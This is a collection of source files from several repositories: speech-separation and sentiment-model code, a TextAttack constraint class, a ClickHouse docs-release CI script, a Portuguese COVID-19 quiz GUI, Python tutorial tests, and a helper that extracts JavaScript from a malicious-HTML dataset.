torch.save(system.model.state_dict(), os.path.join(exp_dir, "checkpoints/final.pth"))
class ChimeraSystem(System):
def __init__(self, *args, mask_mixture=True, **kwargs):
super().__init__(*args, **kwargs)
self.mask_mixture = mask_mixture
def common_step(self, batch, batch_nb, train=False):
inputs, targets, masks = self.unpack_data(batch)
embeddings, est_masks = self(inputs)
spec = take_mag(self.model.encoder(inputs.unsqueeze(1)))
if self.mask_mixture:
est_masks = est_masks * spec.unsqueeze(1)
masks = masks * spec.unsqueeze(1)
loss, loss_dic = self.loss_func(
embeddings, targets, est_src=est_masks, target_src=masks, mix_spec=spec
)
return loss, loss_dic
def training_step(self, batch, batch_nb):
loss, loss_dic = self.common_step(batch, batch_nb, train=True)
tensorboard_logs = dict(
train_loss=loss, train_dc_loss=loss_dic["dc_loss"], train_pit_loss=loss_dic["pit_loss"]
)
return {"loss": loss, "log": tensorboard_logs}
def validation_step(self, batch, batch_nb):
loss, loss_dic = self.common_step(batch, batch_nb, train=False)
tensorboard_logs = dict(
val_loss=loss, val_dc_loss=loss_dic["dc_loss"], val_pit_loss=loss_dic["pit_loss"]
)
return {"val_loss": loss, "log": tensorboard_logs}
def validation_end(self, outputs):
# Not so pretty for now but it helps.
avg_loss = torch.stack([x["val_loss"] for x in outputs]).mean()
avg_dc_loss = torch.stack([x["log"]["val_dc_loss"] for x in outputs]).mean()
avg_pit_loss = torch.stack([x["log"]["val_pit_loss"] for x in outputs]).mean()
tensorboard_logs = dict(
val_loss=avg_loss, val_dc_loss=avg_dc_loss, val_pit_loss=avg_pit_loss
)
return {
"val_loss": avg_loss,
"log": tensorboard_logs,
"progress_bar": {"val_loss": avg_loss},
}
def unpack_data(self, batch):
mix, sources = batch
# Compute magnitude spectrograms and IRM
src_mag_spec = take_mag(self.model.encoder(sources))
real_mask = src_mag_spec / (src_mag_spec.sum(1, keepdim=True) + EPS)
# Get the src idx having the maximum energy
binary_mask = real_mask.argmax(1)
return mix, binary_mask, real_mask
class ChimeraLoss(nn.Module):
"""Combines Deep clustering loss and mask inference loss for ChimeraNet.
Args:
alpha (float): loss weight. Total loss will be :
`alpha` * dc_loss + (1 - `alpha`) * mask_mse_loss.
"""
def __init__(self, alpha=0.1):
super().__init__()
assert alpha >= 0, "Negative alpha values don't make sense."
assert alpha <= 1, "Alpha values above 1 don't make sense."
# PIT loss
self.src_mse = PITLossWrapper(pairwise_mse, pit_from="pw_mtx")
self.alpha = alpha
def forward(self, est_embeddings, target_indices, est_src=None, target_src=None, mix_spec=None):
"""
Args:
est_embeddings (torch.Tensor): Estimated embedding from the DC head.
target_indices (torch.Tensor): Target indices that'll be passed to
the DC loss.
est_src (torch.Tensor): Estimated magnitude spectrograms (or masks).
target_src (torch.Tensor): Target magnitude spectrograms (or masks).
mix_spec (torch.Tensor): The magnitude spectrogram of the mixture
from which VAD will be computed. If None, no VAD is used.
Returns:
torch.Tensor, the total loss, averaged over the batch.
dict with `dc_loss` and `pit_loss` keys, unweighted losses.
"""
if self.alpha != 0 and (est_src is None or target_src is None):
raise ValueError(
"Expected target and estimated spectrograms to " "compute the PIT loss, found None."
)
binary_mask = None
if mix_spec is not None:
binary_mask = ebased_vad(mix_spec)
# Dc loss is already divided by VAD in the loss function.
dc_loss = deep_clustering_loss(
embedding=est_embeddings, tgt_index=target_indices, binary_mask=binary_mask
)
src_pit_loss = self.src_mse(est_src, target_src)
# Equation (4) from Chimera paper.
tot = self.alpha * dc_loss.mean() + (1 - self.alpha) * src_pit_loss
# Return unweighted losses as well for logging.
loss_dict = dict(dc_loss=dc_loss.mean(), pit_loss=src_pit_loss)
return tot, loss_dict
if __name__ == "__main__":
import yaml
from pprint import pprint
from asteroid.utils import prepare_parser_from_dict, parse_args_as_dict
with open("local/conf.yml") as f:
def_conf = yaml.safe_load(f)
parser = prepare_parser_from_dict(def_conf, parser=parser)
arg_dic, plain_args = parse_args_as_dict(parser, return_plain_args=True)
pprint(arg_dic)
main(arg_dic)
``` |
{
"source": "53X/CharNet-for-Sentiments",
"score": 3
} |
#### File: 53X/CharNet-for-Sentiments/model.py
```python
import keras
from keras.layers import Conv1D, MaxPooling1D, Dense, Input, Embedding, Dropout, Flatten
from keras.optimizers import SGD
from keras.initializers import RandomNormal
from keras.models import Model
def character_model(classification, vocab_size=69, maxlen=1014):
optimizer = SGD(lr=0.01, momentum=0.9)
init = RandomNormal(mean=0.0, stddev=0.02)
input_layer = Input(shape=(maxlen, ), name='sentence_input')
embedding = Embedding(input_dim = vocab_size+1, output_dim = 70,
name='character_embedding')(input_layer)
conv_1 = Conv1D(filters=1024, kernel_size=7, padding='valid',
activation='relu',kernel_initializer=init ,name='first_conv')(embedding)
pool_1 = MaxPooling1D(pool_size=3, padding='valid', name='first_pool')(conv_1)
conv_2 = Conv1D(filters=1024, kernel_size=7, padding='valid',
activation='relu',kernel_initializer=init, name='second_conv')(pool_1)
pool_2 = MaxPooling1D(pool_size=3, padding='valid', name='second_pool')(conv_2)
conv_3 = Conv1D(filters=1024, kernel_size=3, padding='valid',
activation='relu',kernel_initializer=init, name='third_conv')(pool_2)
conv_4 = Conv1D(filters=1024, kernel_size=3, padding='valid',
activation='relu',kernel_initializer=init, name='fourth_conv')(conv_3)
conv_5 = Conv1D(filters=1024, kernel_size=3, padding='valid',
activation='relu',kernel_initializer=init, name='fifth_conv')(conv_4)
conv_6 = Conv1D(filters=1024, kernel_size=3, padding='valid',
activation='relu',kernel_initializer=init, name='sixth_conv')(conv_5)
pool_6 = MaxPooling1D(pool_size=3, padding='valid', name='third_pool')(conv_6)
flattened = Flatten()(pool_6)
fully_conn_1 = Dense(2048, activation='relu')(flattened)
fully_conn_1 = Dropout(0.5)(fully_conn_1)
fully_conn_2 = Dense(2048, activation='relu')(fully_conn_1)
fully_conn_2 = Dropout(0.5)(fully_conn_2)
output = Dense(classification, activation='softmax')(fully_conn_2)
model = Model(inputs = input_layer, outputs = output)
model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
return model
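# Usage sketch (hyperparameters here are illustrative, not from the paper):
#   model = character_model(classification=2)   # binary sentiment
#   model.fit(x_train, y_train, batch_size=128, epochs=10)
#   # y_train must be one-hot encoded to match categorical_crossentropy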
``` |
{
"source": "53X/TextAttack",
"score": 3
} |
#### File: grammaticality/language_models/language_model_constraint.py
```python
import math
import torch
from textattack.constraints import Constraint
class LanguageModelConstraint(Constraint):
"""
Determines if two sentences have a swapped word that has a similar
probability according to a language model.
Args:
max_log_prob_diff (float): the maximum difference in log-probability
between x and x_adv
"""
def __init__(self, max_log_prob_diff=None):
if max_log_prob_diff is None:
raise ValueError("Must set max_log_prob_diff")
self.max_log_prob_diff = max_log_prob_diff
def get_log_probs_at_index(self, text_list, word_index):
""" Gets the log-probability of items in `text_list` at index
`word_index` according to a language model.
"""
raise NotImplementedError()
def _check_constraint(self, transformed_text, current_text, original_text=None):
try:
indices = transformed_text.attack_attrs["newly_modified_indices"]
except KeyError:
raise KeyError(
"Cannot apply language model constraint without `newly_modified_indices`"
)
for i in indices:
probs = self.get_log_probs_at_index((current_text, transformed_text), i)
if len(probs) != 2:
raise ValueError(
f"Error: get_log_probs_at_index returned {len(probs)} values for 2 inputs"
)
cur_prob, transformed_prob = probs
if self.max_log_prob_diff is None:
                # Convert to log-probabilities; the original referenced undefined p1/p2.
                cur_prob, transformed_prob = math.log(cur_prob), math.log(transformed_prob)
if abs(cur_prob - transformed_prob) > self.max_log_prob_diff:
return False
return True
def extra_repr_keys(self):
return ["max_log_prob_diff"]
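# Subclass sketch: a concrete constraint only needs to score the word at
# `word_index` under some language model. The `.words` access and the
# `my_lm_log_prob` call below are assumptions, not a TextAttack API:
#   class MyLMConstraint(LanguageModelConstraint):
#       def get_log_probs_at_index(self, text_list, word_index):
#           return [my_lm_log_prob(t.words[word_index], t) for t in text_list]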
``` |
{
"source": "540522905/ClickHouse",
"score": 2
} |
#### File: tests/ci/docs_release.py
```python
import logging
import subprocess
import os
import time
import json
import sys
from github import Github
from report import create_test_html_report
from s3_helper import S3Helper
from pr_info import PRInfo
from get_robot_token import get_best_robot_token
from ssh import SSHKey
NAME = "Docs Release (actions)"
def process_logs(s3_client, additional_logs, s3_path_prefix):
additional_urls = []
for log_path in additional_logs:
if log_path:
additional_urls.append(
s3_client.upload_test_report_to_s3(
log_path,
s3_path_prefix + "/" + os.path.basename(log_path)))
return additional_urls
def upload_results(s3_client, pr_number, commit_sha, test_results, additional_files):
s3_path_prefix = f"{pr_number}/{commit_sha}/docs_release"
additional_urls = process_logs(s3_client, additional_files, s3_path_prefix)
branch_url = "https://github.com/ClickHouse/ClickHouse/commits/master"
branch_name = "master"
if pr_number != 0:
branch_name = f"PR #{pr_number}"
branch_url = f"https://github.com/ClickHouse/ClickHouse/pull/{pr_number}"
commit_url = f"https://github.com/ClickHouse/ClickHouse/commit/{commit_sha}"
task_url = f"https://github.com/ClickHouse/ClickHouse/actions/runs/{os.getenv('GITHUB_RUN_ID')}"
raw_log_url = additional_urls[0]
additional_urls.pop(0)
html_report = create_test_html_report(NAME, test_results, raw_log_url, task_url, branch_url, branch_name, commit_url, additional_urls)
with open('report.html', 'w', encoding='utf-8') as f:
f.write(html_report)
url = s3_client.upload_test_report_to_s3('report.html', s3_path_prefix + ".html")
logging.info("Search result in url %s", url)
return url
def get_commit(gh, commit_sha):
repo = gh.get_repo(os.getenv("GITHUB_REPOSITORY", "ClickHouse/ClickHouse"))
commit = repo.get_commit(commit_sha)
return commit
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
temp_path = os.path.join(os.getenv("TEMP_PATH"))
repo_path = os.path.join(os.getenv("REPO_COPY"))
with open(os.getenv('GITHUB_EVENT_PATH'), 'r', encoding='utf-8') as event_file:
event = json.load(event_file)
pr_info = PRInfo(event, need_changed_files=True)
gh = Github(get_best_robot_token())
if not pr_info.has_changes_in_documentation():
        logging.info("No changes in documentation")
commit = get_commit(gh, pr_info.sha)
commit.create_status(context=NAME, description="No changes in docs", state="success")
sys.exit(0)
logging.info("Has changes in docs")
if not os.path.exists(temp_path):
os.makedirs(temp_path)
images_path = os.path.join(temp_path, 'changed_images.json')
docker_image = 'clickhouse/docs-release'
if os.path.exists(images_path):
logging.info("Images file exists")
with open(images_path, 'r', encoding='utf-8') as images_fd:
images = json.load(images_fd)
logging.info("Got images %s", images)
if 'clickhouse/docs-release' in images:
docker_image += ':' + images['clickhouse/docs-release']
logging.info("Got docker image %s", docker_image)
for i in range(10):
try:
subprocess.check_output(f"docker pull {docker_image}", shell=True)
break
except Exception as ex:
time.sleep(i * 3)
logging.info("Got execption pulling docker %s", ex)
else:
raise Exception(f"Cannot pull dockerhub for image {docker_image}")
test_output = os.path.join(temp_path, 'docs_release_log')
if not os.path.exists(test_output):
os.makedirs(test_output)
token = os.getenv('CLOUDFLARE_TOKEN')
cmd = "docker run --cap-add=SYS_PTRACE --volume=$SSH_AUTH_SOCK:/ssh-agent -e SSH_AUTH_SOCK=/ssh-agent " \
f"-e CLOUDFLARE_TOKEN={token} --volume={repo_path}:/repo_path --volume={test_output}:/output_path {docker_image}"
run_log_path = os.path.join(test_output, 'runlog.log')
with open(run_log_path, 'w', encoding='utf-8') as log, SSHKey("ROBOT_CLICKHOUSE_SSH_KEY"):
with subprocess.Popen(cmd, shell=True, stderr=log, stdout=log) as process:
retcode = process.wait()
if retcode == 0:
logging.info("Run successfully")
status = "success"
description = "Released successfuly"
else:
description = "Release failed (non zero exit code)"
status = "failure"
logging.info("Run failed")
subprocess.check_call(f"sudo chown -R ubuntu:ubuntu {temp_path}", shell=True)
files = os.listdir(test_output)
lines = []
additional_files = []
if not files:
logging.error("No output files after docs release")
description = "No output files after docs release"
status = "failure"
else:
for f in files:
path = os.path.join(test_output, f)
additional_files.append(path)
with open(path, 'r', encoding='utf-8') as check_file:
for line in check_file:
if "ERROR" in line:
lines.append((line.split(':')[-1], "FAIL"))
if lines:
status = "failure"
description = "Found errors in docs"
elif status != "failure":
lines.append(("No errors found", "OK"))
else:
lines.append(("Non zero exit code", "FAIL"))
s3_helper = S3Helper('https://s3.amazonaws.com')
report_url = upload_results(s3_helper, pr_info.number, pr_info.sha, lines, additional_files)
print("::notice ::Report url: {report_url}")
commit = get_commit(gh, pr_info.sha)
commit.create_status(context=NAME, description=description, state=status, target_url=report_url)
``` |
{
"source": "5405647/pca---python",
"score": 3
} |
#### File: 5405647/pca---python/main.py
```python
import PySimpleGUI as sg
def janelaPrincipal():
sg.theme('Dark Green 3')
layout = [
[sg.Text('Jogo de Perguntas e Respostas', font=("Unispace", 25))],
[sg.Text('\nVocê sabia que as chances de contrair a Covid-19 é proporcional ao seu conhecimento sobre ela?\nSerá que você está fazendo todas as medidas de segurança corretamente? É isso que nós vamos ver agora!',
font=("Arial", 13))],
[sg.Text('\nInstruções sobre o jogo', font=("Arial", 15, 'underline'))],
[sg.Text('Será elencado 15 questões sobre os meios de segurança para reduzir as chances de infecção pela Covid-19. Você\ndeve responder se a questão é um fato ou fake onde, após responder, será exibida a informação sobre a resposta correta.',
font=("Arial", 12))],
[sg.Text('\nPronto para começar?', font=("Arial", 15))],
[sg.Button('Sim', size=(10, 1)), sg.Button('Não', size=(10, 1))]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', modal=True)
while True:
event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Não':
break
if event == 'Sim':
window.close()
pergunta1()
break
def pergunta1():
sg.theme('Dark Green 3')
layout = [
[sg.Text('1. Tudo bem compartilhar objetos, tipo o celular, pois o novo coronavírus não se transmite dessa forma.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Estudos já comprovaram que o novo coronavírus pode sobreviver em diversos tipos diferentes de objetos e superfícies.', font=('Arial', 13))]
window.close()
pergunta2()
break
else:
[sg.Popup('Acertou! Estudos já comprovaram que o novo coronavírus pode sobreviver em diversos tipos diferentes de objetos e superfícies.', font=('Arial', 13))]
window.close()
pergunta2()
break
def pergunta2():
sg.theme('Dark Green 3')
layout = [
[sg.Text('2. Não preciso me preocupar em higienizar as compras do mercado, afinal, eu mesmo peguei da prateleira com as mãos limpas.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Apesar de recentemente esse tipo de contaminação ter se revelado menos comum, higiene nunca é demais.', font=('Arial', 13))]
window.close()
pergunta3()
break
else:
[sg.Popup('Acertou! Apesar de recentemente esse tipo de contaminação ter se revelado menos comum, higiene nunca é demais.', font=('Arial', 13))]
window.close()
pergunta3()
break
def pergunta3():
sg.theme('Dark Green 3')
layout = [
[sg.Text('3. Em caso de sintomas gripais e estando em locais públicos, o mais indicado a se fazer é cobrir a boca com o antebraço ou o cotovelo ao espirrar e/ou tossir.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
            [sg.Popup('Errou! Fora de casa devemos usar máscara o tempo todo (exceto na hora de comer e beber) e respeitar o distanciamento. Além disso, com qualquer sintoma de gripe ou resfriado, o mais indicado é ficar em casa!', font=('Arial', 13))]
window.close()
pergunta4()
break
else:
            [sg.Popup('Acertou! Fora de casa devemos usar máscara o tempo todo (exceto na hora de comer e beber) e respeitar o distanciamento. Além disso, com qualquer sintoma de gripe ou resfriado, o mais indicado é ficar em casa!', font=('Arial', 13))]
window.close()
pergunta4()
break
def pergunta4():
sg.theme('Dark Green 3')
layout = [
[sg.Text('4. Se me sinto bem e tomo todos os cuidados, tudo bem abraçar e beijar as pessoas com quem moro.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
            [sg.Popup('Acertou! Porém, baixar a guarda em casa é possível somente se todos estiverem respeitando as orientações sanitárias. Caso contrário, mesmo se cuidando, você pode estar em risco dentro da sua própria casa.', font=('Arial', 13))]
window.close()
pergunta5()
break
else:
            [sg.Popup('Errou! Baixar a guarda em casa é possível somente se todos estiverem respeitando as orientações sanitárias. Caso contrário, mesmo se cuidando, você pode estar em risco dentro da sua própria casa.', font=('Arial', 13))]
window.close()
pergunta5()
break
def pergunta5():
sg.theme('Dark Green 3')
layout = [
[sg.Text('5. Os sintomas mais comuns da Covid-19 são: febre, tosse, cansaço, dor de cabeça e alteração do olfato.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Acertou! Mas fique atento(a): os sintomas não ocorrem no mesmo instante da infecção.', font=('Arial', 13))]
window.close()
pergunta6()
break
else:
[sg.Popup('Errou! Esses são os sintomas mais comuns, mas fique atento(a): os sintomas não ocorrem no mesmo instante da infecção.', font=('Arial', 13))]
window.close()
pergunta6()
break
def pergunta6():
sg.theme('Dark Green 3')
layout = [
[sg.Text('6. É possível estar com a Covid-19 por até 14 dias antes de apresentar os sintomas.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Acertou! O período de incubação varia entre 2 e 14 dias. E a média é de 5 dias.', font=('Arial', 13))]
window.close()
pergunta7()
break
else:
[sg.Popup('Errou! O período de incubação varia entre 2 e 14 dias. E a média é de 5 dias.', font=('Arial', 13))]
window.close()
pergunta7()
break
def pergunta7():
sg.theme('Dark Green 3')
layout = [
[sg.Text('7. Com mais de um ano de pandemia, já há medicamentos específicos e eficazes para o tratamento da Covid-19.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Ainda não há medicamento ideal para o combate ao vírus - em qualquer fase da doença - e automedicar-se é bastante perigoso, podendo levar à morte.', font=('Arial', 13))]
window.close()
pergunta8()
break
else:
[sg.Popup('Acertou! Ainda não há medicamento ideal para o combate ao vírus - em qualquer fase da doença - e automedicar-se é bastante perigoso, podendo levar à morte.', font=('Arial', 13))]
window.close()
pergunta8()
break
def pergunta8():
sg.theme('Dark Green 3')
layout = [
[sg.Text('8. Mesmo uma pessoa sem sintomas da COVID-19 pode contaminar outras.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Acertou! É importante lembrar que existe a possibilidade de uma pessoa transportar e transmitir o vírus por gotículas respiratórias e pelas mãoes contaminadas, sem estar apresentando qualquer sintoma da COVID-19.', font=('Arial', 13))]
window.close()
pergunta9()
break
else:
[sg.Popup('Errou! É importante lembrar que existe a possibilidade de uma pessoa transportar e transmitir o vírus por gotículas respiratórias e pelas mãoes contaminadas, sem estar apresentando qualquer sintoma da COVID-19.', font=('Arial', 13))]
window.close()
pergunta9()
break
def pergunta9():
sg.theme('Dark Green 3')
layout = [
[sg.Text('9. Usando máscara não é possível ser infectado.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! O uso da máscara é fundamental, mas precisa estar em conjunção com aqueles outros cuidados: distanciamento social e higienização constante das mãos.', font=('Arial', 13))]
window.close()
pergunta10()
break
else:
[sg.Popup('Acertou! O uso da máscara é fundamental, mas precisa estar em conjunção com aqueles outros cuidados: distanciamento social e higienização constante das mãos.', font=('Arial', 13))]
window.close()
pergunta10()
break
def pergunta10():
sg.theme('Dark Green 3')
layout = [
[sg.Text('10. A COVID-19 é mais perigosa para indivíduos acima dos 60 anos ou debilitados, portadores de doenças crônicas e crianças.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Crianças não estão no grupo de risco, mas nada de relaxar os cuidados. Mesmo sendo mais raros, muitos casos graves em crianças têm sido relatados.', font=('Arial', 13))]
window.close()
pergunta11()
break
else:
[sg.Popup('Acertou! Crianças não estão no grupo de risco, mas nada de relaxar os cuidados. Mesmo sendo mais raros, muitos casos graves em crianças têm sido relatados.', font=('Arial', 13))]
window.close()
pergunta11()
break
def pergunta11():
sg.theme('Dark Green 3')
layout = [
[sg.Text('11. Enquanto não temos vacina suficiente para toda a população, a imunização de rebanho se mostra uma boa estratégia.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Além de colocar em risco boa parte da população, apostar na imunidade de rebanho e deixar a epidemia avançar favoreceria o desenvolvimento de novas cepas do vírus que podem ser mais agressivas ou resistentes à vacina.', font=('Arial', 13))]
window.close()
pergunta12()
break
else:
[sg.Popup('Acertou! Além de colocar em risco boa parte da população, apostar na imunidade de rebanho e deixar a epidemia avançar favoreceria o desenvolvimento de novas cepas do vírus que podem ser mais agressivas ou resistentes à vacina.', font=('Arial', 13))]
window.close()
pergunta12()
break
def pergunta12():
sg.theme('Dark Green 3')
layout = [
[sg.Text('12. Devo procurar hospital quando estiver espirrando.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Estar espirrando não é condição suficiente para se deslocar até o hospital. Procure atendimento médico se surgir febre ou apresentar sinais de fadiga ou desconforto para respirar.', font=('Arial', 13))]
window.close()
pergunta13()
break
else:
[sg.Popup('Acertou! Estar espirrando não é condição suficiente para se deslocar até o hospital. Procure atendimento médico se surgir febre ou apresentar sinais de fadiga ou desconforto para respirar.', font=('Arial', 13))]
window.close()
pergunta13()
break
def pergunta13():
sg.theme('Dark Green 3')
layout = [
[sg.Text('13. É melhor sempre evitar ir ao hospital, mesmo que para controlar doenças crônicas, e diminuir as chances de exposição ao vírus.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Várias situações, como dor torácica, falta de ar, palpitações, desmaio, perda de força, convulsão, dor abdominal intensa e hemorragias, exigem atendimento médico imediato e não procurá-lo pode ter graves consequências. Além disso, todos os cuidados no controle de doenças crônicas, como diabetes, hipertensão, insuficiência cardíaca, doenças reumatológicas, oncológicas e pulmonares, devem ser mantidos, tá?', font=('Arial', 13))]
window.close()
pergunta14()
break
else:
[sg.Popup('Acertou! Várias situações, como dor torácica, falta de ar, palpitações, desmaio, perda de força, convulsão, dor abdominal intensa e hemorragias, exigem atendimento médico imediato e não procurá-lo pode ter graves consequências. Além disso, todos os cuidados no controle de doenças crônicas, como diabetes, hipertensão, insuficiência cardíaca, doenças reumatológicas, oncológicas e pulmonares, devem ser mantidos, tá?', font=('Arial', 13))]
window.close()
pergunta14()
break
def pergunta14():
sg.theme('Dark Green 3')
layout = [
[sg.Text('14. A vacina da gripe não protege contra a COVID-19.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Acertou! Porém é importante se vacinar para diminuir o volume de pessoas procurando atendimento médico e favorecer o diagnóstico mais rápido da COVID-19.', font=('Arial', 13))]
window.close()
pergunta15()
break
else:
[sg.Popup('Errou! Porém é importante se vacinar para diminuir o volume de pessoas procurando atendimento médico e favorecer o diagnóstico mais rápido da COVID-19.', font=('Arial', 13))]
window.close()
pergunta15()
break
def pergunta15():
sg.theme('Dark Green 3')
layout = [
[sg.Text('15. Qualquer sabão serve para proteger as mãos do contato com o vírus.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Acertou! A boa e velha prática nunca sai de moda.', font=('Arial', 13))]
window.close()
conclusao()
break
else:
[sg.Popup('Errou! A boa e velha prática nunca sai de moda.', font=('Arial', 13))]
window.close()
conclusao()
break
def conclusao():
sg.theme('Dark Green 3')
layout = [
[sg.Text('Fim de Jogo!', font=("Unispace", 25, 'underline'))],
[sg.Text('''Esperamos que com esse jogo você consiga ter absorvido o
máximo de informações a respeito dessa pandemia que assola
o mundo e, com isso, adote todas as medidas necessárias para
se evitar ser contaminado pela COVID-19.''', font=("Arial", 14))],
[sg.Text('Obrigado por participar do nosso jogo!', font=("Arial", 14))],
[sg.Button('Sair', size=(10, 1))]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', modal=True)
while True:
        event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Sair':
break
janelaPrincipal()
``` |
{
"source": "54070356/python-tutorial",
"score": 4
} |
#### File: python-tutorial/core/basic_test.py
```python
import unittest
class MyTestCase(unittest.TestCase):
def test_return(self):
def f1():
a = 'a'
b = 'b'
return a, b
r1, _ = f1()
self.assertEqual(r1, 'a')
r1, *_ = f1()
self.assertEqual(r1, 'a')
r1, r2 = f1()
self.assertEqual(r2, 'b')
if __name__ == '__main__':
unittest.main()
```
#### File: python-tutorial/core/dataclass_test.py
```python
import unittest
from dataclasses import dataclass, field
@dataclass
class Person:
name: str = 'tom'
age: int = 12
class MyTestCase(unittest.TestCase):
def test_something(self):
person = Person('Jack', 10)
print(person)
self.assertEqual(True, True)
if __name__ == '__main__':
unittest.main()
```
#### File: python-tutorial/core/dict_test.py
```python
import unittest
class MyTestCase(unittest.TestCase):
def test_1(self):
A = 'a'
dict1 = {
A: 'v'
}
self.assertEqual('v', dict1.get('a'))
def test_empty(self):
d1 = {}
if not d1:
print('empty')
d2 = {'k': 'v'}
if d2:
print('not empty')
else:
print('empty')
self.assertEqual(True, True)
def test_case3(self):
"""
遍历字典
"""
self.assertEqual(True, True)
def test_del(self):
"""
        Delete elements
"""
dict1 = {
'a': 'av',
'b': 'bv'
}
print('origin:', dict1)
del dict1['a']
print('del a:', dict1)
# del dict1['c'] will raise exception
dict1.pop('c', None)
print('del c:', dict1)
self.assertEqual(True, True)
def test_size(self):
d1 = {'k1': 'v1', 'k2': 'v2'}
self.assertEqual(len(d1), 2)
def test_get(self):
d1 = {
'k1': 'v1',
'k2': None
}
self.assertEqual(d1.get('k1'), 'v1')
self.assertEqual(d1.get('k2'), None)
self.assertEqual(d1.get('k2', 'v2'), None)
self.assertEqual(d1.get('k3'), None)
self.assertEqual(d1.get('k3', 'v3'), 'v3')
def test_set(self):
d1 = {'k1': 'v1'}
self.assertEqual(d1.get('k1'), 'v1')
d1['k2'] = 'v2'
self.assertEqual(d1.get('k2'), 'v2')
def test_update(self):
d1 = {'k1': 'v1', 'k2': 'v2'}
self.assertEqual(len(d1), 2)
d2 = {'k2': 'v2-new', 'k3': 'v3'}
d1.update(d2)
self.assertEqual(len(d1), 3)
self.assertEqual(d1.get('k1'), 'v1')
self.assertEqual(d1.get('k2'), 'v2-new')
self.assertEqual(d1.get('k3'), 'v3')
if __name__ == '__main__':
unittest.main()
```
#### File: python-tutorial/core/dir_test.py
```python
import shutil
import unittest
import pathlib
class MyTestCase(unittest.TestCase):
def test_delete_dir(self):
a_dir = 'logs'
shutil.rmtree(a_dir)
self.assertEqual(True, True)
def test_parent(self):
fn = 'dir_test.py'
print(pathlib.Path(fn).parent)
self.assertEqual(True, True)
if __name__ == '__main__':
unittest.main()
```
#### File: python-tutorial/core/numpy_array_test.py
```python
import unittest
import numpy as np
class MyTestCase(unittest.TestCase):
def test_slice(self):
a = np.array([0, 1, 2, 3, 4])
print(a[:-3:-1])
print(a[:-2:-1])
self.assertEqual([4], a[:-2:-1])
def test_argsort(self):
a = np.array([0.4, 0.2, 0.3])
print(a.argsort())
self.assertEqual(True, (np.array([0, 1, 2]) == a.argsort()).all())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "5412jason/AntiJacker",
"score": 3
} |
#### File: 5412jason/AntiJacker/Malicious_parser.py
```python
import os
path = "C:\\Users\\17862\\OneDrive\\Desktop\\Datasets\\malicious_data"
os.chdir(path)
def read_File(file_path, file):
try:
with open(file_path, "r") as f:
lines = f.readlines()
#print(lines)
except Exception as e:
try:
with open(file_path, "r", encoding="utf-8") as f:
lines = f.readlines()
#print(lines)
except Exception as e2:
try:
with open(file_path, "r", encoding="latin1") as f:
lines = f.readlines()
# print(lines)
except Exception as e3:
return False
javascript = []
start = False
for line in lines:
if "<script" in line:
script_Start = line.find("<script")
line = line[script_Start:]
#javascript.append(line)
start = True
if "</script>" in line:
script_End = line.find("</script>")
line = line[:script_End + 9]
javascript.append(line)
start = False
if start == True:
javascript.append(line)
try:
with open("C:\\Users\\17862\\OneDrive\\Desktop\\Datasets\\malicious_js\\" + file + ".js", "w") as f:
f.writelines(javascript)
except Exception as e:
try:
with open("C:\\Users\\17862\\OneDrive\\Desktop\\Datasets\\malicious_js\\" + file + ".js", "w", encoding="utf-8") as f:
f.writelines(javascript)
